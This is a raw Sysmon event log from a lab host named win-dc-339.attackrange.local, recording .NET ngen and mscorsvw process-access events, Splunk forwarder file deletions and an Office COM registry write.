14:57:54.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-960D-00000000BB01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.936{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-960D-00000000BB01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-960D-00000000BB01}3768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.889{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E38F0DF75505A854371C9C6210951C14,SHA256=B6D24779A1055CB4CB37704130C033A492B7F2EE0F83A83C7EB152905EFD135F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.858{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-950D-00000000BB01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.842{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-950D-00000000BB01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.842{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-950D-00000000BB01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.779{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-940D-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:54.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{261B8CA9-3BAF-4BD0-B0C2-BF04286785C6}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\Office16\OUTLCTL.DLL 10341000x800000000000000076388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.764{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-940D-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.764{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-940D-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.654{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-930D-00000000BB01}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.639{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-930D-00000000BB01}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.639{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-930D-00000000BB01}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.514{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB567D91278D14D64FB3982B4304DCE0,SHA256=3672242D0E60BD0910C44ACD12757A46D7EF9DB44E2B2CCACB01868BB35EAD2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.514{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37455335C3925C29712CC1FFD0697E40,SHA256=AB7A7A5C95CFAFFB8CB14A46C0E4D3855607261A577E7CE1F4D99623FA365C28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.483{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-920D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.467{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-920D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.467{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-920D-00000000BB01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.436{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-910D-00000000BB01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.420{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-910D-00000000BB01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-910D-00000000BB01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.358{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF2-607E-900D-00000000BB01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.342{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBF2-607E-900D-00000000BB01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.342{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF2-607E-900D-00000000BB01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 